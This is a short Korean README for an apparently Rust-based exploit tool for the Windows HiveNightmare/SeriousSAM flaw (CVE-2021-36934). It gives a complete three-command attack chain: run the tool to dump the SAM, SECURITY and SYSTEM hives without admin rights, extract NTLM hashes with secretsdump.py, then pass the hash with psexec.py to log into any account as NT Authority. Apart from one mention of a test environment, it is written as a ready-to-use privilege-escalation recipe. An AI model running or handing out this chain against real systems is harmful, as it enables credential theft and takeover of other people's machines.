
CVE-2021-36934용 익스플로잇
HiveNightmare/SeriousSAM 취약점을 익스플로잇하여 관리자 권한 없이 민감한 데이터가 포함된 레지스트리 하이브를 읽을 수 있게 해주는 도구입니다. 그게 권한 상승처럼 들리지 않는다면 저는 뭐가 권한 상승인지 모르겠군요.
cargo build로 익스플로잇을 빌드하고 바이너리를 획득한 후, 테스트 환경에 배포하고 CMD를 열어 .\oxide_hive [max shadow copies]를 실행하세요. 섀도 복사본의 기본값은 15입니다. SAM, SECURITY, SYSTEM 하이브가 작업 디렉터리에 덤프되어야 합니다.
그런 다음 이 스크립트를 secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local 명령어와 함께 사용하여 NTLM 해시를 검색할 수 있습니다.
그런 다음 또 다른 스크립트를 psexec.py -hashes <account's hash> <user>@<machine's ip> cmd.exe 명령어와 함께 사용하여 원격으로 모든 계정에 로그인할 수 있습니다. 축하합니다. 단 3개의 명령어만으로 권한 없는 사용자에서 NT Authority로 올라섰습니다.